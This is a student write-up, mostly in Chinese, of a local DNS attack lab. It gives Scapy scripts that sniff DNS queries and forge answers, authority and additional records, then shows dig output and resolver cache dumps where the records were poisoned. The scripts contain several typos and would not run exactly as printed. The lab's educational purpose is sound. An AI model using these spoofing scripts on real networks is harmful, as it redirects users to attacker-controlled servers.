

Local DNS Attack Lab

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TASK 1 Directly Spoofing Response to User

Dns 攻击代码部分：

将 www.example.net 的 dns 引导至 10.0.2.5，设置相应网卡进行抓包

```
1#!/usr/bin/env python3
2from scapy.all import *
3
4def spoof_dns(pkt):
5    if (DNS in pkt and 'www.example.net' in pkt[DNS].qd.qname.decode('utf-8')):
6
7        # Swap the source and destination IP address
8        IPpkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)
9
10       # Swap the source and destination port number
11       UDPpkt = UDP(dport=pkt[UDP].sport, sport=53)
12
13       # The Answer Section
14       Anssec = DNSRR(rrname=pkt[DNS].qd.qname, type='A',
15                       ttl=259200, rdata='10.0.2.5')
16
17       # The Authority Section
18       NSsec1 = DNSRR(rrname='example.net', type='NS',
19                       ttl=259200, rdata='ns1.example.net')
20       NSsec2 = DNSRR(rrname='example.net', type='NS',
21                       ttl=259200, rdata='ns2.example.net')
22
23       # The Additional Section
24       Addsec1 = DNSRR(rrname='ns1.example.net', type='A',
25                       ttl=259200, rdata='1.2.3.4')
26       Addsec2 = DNSRR(rrname='ns2.example.net', type='A',
27                       ttl=259200, rdata='5.6.7.8')
28
29       # Construct the DNS packet
30       DNSpkt = DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1, rd=0, qr=1,
31
32                       qdcount=1, ancount=1, nscount=2, arcount=2,
33                       an=Anssec, ns=NSsec1/NSsec2, ar=Addsec1/Addsec2)
34
35       # Construct the entire IP packet and send it out
36       spoofpkt = IPpkt/UDPPkt/DNSpkt
37       send(spoofpkt)
38
39 # Sniff UDP query packets and invoke spoof_dns().
40 f = 'udp and dst port 53'
41 pkt = sniff(iface='br-62c5ebe75e0c', filter=f, prn=spoof dns)
```

开始攻击后，在 User 端进行 dig 操作，结果显示如下：
显示 www.example.net 的 dns 变为 10.0.2.5，修改成功

```
root@aaebc8f9c4e2:/# dig www.example.net

; <>> DiG 9.16.1-Ubuntu <>> www.example.net
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 2283
;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2

;; QUESTION SECTION:
;www.example.net.          IN      A

;; ANSWER SECTION:
www.example.net.        259200  IN      A      10.0.2.5

;; AUTHORITY SECTION:
example.net.            259200  IN      NS      ns1.example.net.
example.net.            259200  IN      NS      ns2.example.net.

;; ADDITIONAL SECTION:
ns1.example.net.        259200  IN      A      1.2.3.4
ns2.example.net.        259200  IN      A      5.6.7.8

;; Query time: 99 msec
;; SERVER: 10.9.0.53#53(10.9.0.53)
;; WHEN: Mon Jul 19 01:13:51 UTC 2021
;; MSG SIZE  rcvd: 206
```

TASK 2 DNS Cache Poisoning Attack – Spoofing Answers

事先对 dns 服务器缓存进行刷新

```
# rndc flush
```

进行如 task1 类似操作，伪造 dns response 报文

```
# rndc dumpdb -cache
#cat/var/cache/bind/dump.db
```

Dump 中缓存记录如下：攻击成功

```
; additional
ns1.example.net.        863975  A      1.2.3.4
; additional
ns2.example.net.        863975  A      5.6.7.8
; authanswer
www.example.net.        863975  A      10.0.2.5
```

Task 3 Spoofing NS Records

攻击代码如下：

设置 NS records ， 访问所有 example.com 域名均需通过 ns.attacker32.com

```
1#!/usr/bin/env python3
2from scapy.all import *
3
4def spoof_dns(pkt):
5    if (DNS in pkt and 'example.com' in pkt[DNS].qd.qname.decode('utf-8')):
6
7        # Swap the source and destination IP address
8        IPpkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)
9
10       # Swap the source and destination port number
11       UDPpkt = UDP(dport=pkt[UDP].sport, sport=53)
12
13       # The Answer Section
14       Anssec = DNSRR(rrname=pkt[DNS].qd.qname, type='A',
15                      ttl=259200, rdata='10.0.2.5')
16
17       # The Authority Section
18       NSsec1 = DNSRR(rrname='example.com', type='NS',
19                      ttl=259200, rdata='ns.attacker32.com')
20       #NSsec2 = DNSRR(rrname='example.net', type='NS',
21                      #ttl=259200, rdata='ns2.example.net')
22
23       # The Additional Section
24       #Addsec1 = DNSRR(rrname='ns1.example.net', type='A',
25                      #ttl=259200, rdata='1.2.3.4')
26       #Addsec2 = DNSRR(rrname='ns2.example.net', type='A',
27                      #ttl=259200, rdata='5.6.7.8')
28
29       # Construct the DNS packet
30       DNSpkt = DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1, rd=0, qr=1,
31                      qdcount=1, ancount=1, nscount=1,
32                      qdcount=1, ancount=1, nscount=1,
33                      an=Anssec, ns=NSsec1)
34       #,ns=NSsec1/NSsec2, ar=Addsec1/Addsec2), , arcount=2,
35
36       # Construct the entire IP packet and send it out
37       spoofpkt = IPpkt/UDPPkt/DNSpkt
38       send(spoofpkt)
39
39 # Sniff UDP query packets and invoke spoof_dns().
40 f = 'udp and dst port 53'
41 pkt = sniff(iface='br-c1317b9d27d2', filter=f, prn=spoof_dns)
```

开始攻击后，在 User 主机上 dig mail.example.com，显示出 Attacker-dns 服务器返回的结果，攻击成功

```
root@d4485429bb7c:/# dig mail.example.com

; <>> DiG 9.16.1-Ubuntu <>> mail.example.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 3106
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
;; EDNS: version: 0, flags:; udp: 4096
;; COOKIE: 34f646bfa4ccf41f0100000060f4e27561ff2e6827c56c79 (good)
;; QUESTION SECTION:
;mail.example.com.           IN      A

;; ANSWER SECTION:
mail.example.com.      259200  IN      A      1.2.3.6

;; Query time: 1716 msec
;; SERVER: 10.9.0.53#53(10.9.0.53)
;; WHEN: Mon Jul 19 02:24:53 UTC 2021
;; MSG SIZE  rcvd: 89
```

如下是 local dns server 缓存里的记录，均被记录：

```
example.com.          863848  NS      ns.attacker32.com.
; authanswer
_.example.com.        863848  A       10.0.2.5
; authanswer
mail.example.com.    863848  A       1.2.3.6
```

Tsak 4 Spoofing NS Records for Another Domain

如下是攻击代码部分：

在 NS 中额外加入 google.com 的 dns

```
1#!/usr/bin/env python3
2from scapy.all import *
3
4def spoof_dns(pkt):
5    if (DNS in pkt and 'www.example.com' in pkt[DNS].qd.qname.decode('utf-8')):
6
7        # Swap the source and destination IP address
8        IPpkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)
9
10       # Swap the source and destination port number
11       UDPpkt = UDP(dport=pkt[UDP].sport, sport=53)
12
13       # The Answer Section
14       Anssec = DNSRR(rrname=pkt[DNS].qd.qname, type='A',
15                      ttl=259200, rdata='10.0.2.5')
16
17       # The Authority Section
18       NSsec1 = DNSRR(rrname='example.com', type='NS',
19                      ttl=259200, rdata='ns.attacker32.com')
20       NSsec2 = DNSRR(rrname='google.com', type='NS',
21                      ttl=259200, rdata='ns.attacker32.com')
22
23       # The Additional Section
24       #Addsec1 = DNSRR(rrname='ns1.example.net', type='A',
25       #                  ttl=259200, rdata='1.2.3.4')
26       #Addsec2 = DNSRR(rrname='ns2.example.net', type='A',
27       #                  ttl=259200, rdata='5.6.7.8')
28
29       # Construct the DNS packet
30       DNSpkt = DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1, rd=0, qr=1,
31                  qdcount=1, ancount=1, nscount=2,
32                  an=Anssec, ns=NSsec1/NSsec2)
33       #, ar=Addsec1/Addsec2)arcount=2,
34       #,ns=NSsec1, ), ,
35
36       # Construct the entire IP packet and send it out
37       spoofpkt = IPpkt/UDPPkt/DNSpkt
38       send(spoofpkt)
39       spoofpkt.show()
40
41# Sniff UDP query packets and invoke spoof_dns().
42f = 'udp and dst port 53'
43pkt = sniff(iface='br-d4b86cc01628', filter=f, prn=spoof_dns)
```

进行攻击后，在 User 端进行 dig 操作，确实得到 google.com 的 dns 修改后结果

```
root@d4485429bb7c:/# dig www.example.com

; <>> DiG 9.16.1-Ubuntu <>> www.example.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 56595
;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 0

;; QUESTION SECTION:
;www.example.com.           IN      A

;; ANSWER SECTION:
www.example.com.      259200  IN      A      10.0.2.5

;; AUTHORITY SECTION:
example.com.          259200  IN      NS      ns.attacker32.com.
google.com.           259200  IN      NS      ns.attacker32.com.

;; Query time: 75 msec
;; SERVER: 10.9.0.53#53(10.9.0.53)
;; WHEN: Mon Jul 19 03:31:58 UTC 2021
;; MSG SIZE  rcvd: 147
```

但实际上缓存中不存在 google.com 的记录，并不合法所以不被记录，和回复记录中的域名不相关的不会加入

```
; authauthority
example.com.          777428  IN      NS      ns.attacker32.com.
```

Task 5 Spoofing Records in the Additional Section

如下是攻击代码部分：

对与 NS 和 Add 部分的修改

```
18  NSsec1 = DNSRR(rrname='example.com', type='NS',
19                  ttl=259200, rdata='ns.attacker32.com')
20  NSsec2 = DNSRR(rrname='example.com', type='NS',
21                  ttl=259200, rdata='ns.example.com')
22
23  # The Additional Section
24  Addsec1 = DNSRR(rrname='ns.attacker32.com', type='A',
25                  ttl=259200, rdata='1.2.3.4')
26  Addsec2 = DNSRR(rrname='ns.example.com', type='A',
27                  ttl=259200, rdata='5.6.7.8')
28  Addsec3 = DNSRR(rrname='www.facebook.com', type='A',
29                  ttl=259200, rdata='3.4.5.6')
30
```

攻击开始后，在 User 端进行 dig 操作，返回正确修改后的结果

```
root@66d3e887e3ad:/# dig www.example.com

; <>> DiG 9.16.1-Ubuntu <>> www.example.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 21577
;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 3

;; QUESTION SECTION:
;www.example.com.           IN      A

;; ANSWER SECTION:
www.example.com.        259200  IN      A      10.0.2.5

;; AUTHORITY SECTION:
example.com.            259200  IN      NS     ns.attacker32.com.
example.com.            259200  IN      NS     ns.example.com.

;; ADDITIONAL SECTION:
ns.attacker32.com.      259200  IN      A      1.2.3.4
ns.example.com.          259200  IN      A      5.6.7.8
www.facebook.com.       259200  IN      A      3.4.5.6

;; Query time: 60 msec
;; SERVER: 10.9.0.53#53(10.9.0.53)
;; WHEN: Mon Jul 19 09:46:57 UTC 2021
```

观察 local dns server 主机缓存里的记录，之有如下两条，其余均不被记录：
其余均不合法，和回复记录中的域名不相关的不会加入，但作为域名服务器是允许的，一个域的域名服务器不一定非要在该域内，域名服务器的 ip 也被记录。

```
example.com.          777591  NS      ns.example.net.
                      777591  NS      ns.attacker32.com.
.... .
; additional
ns.example.com.       863966  A      5.6.7.8
```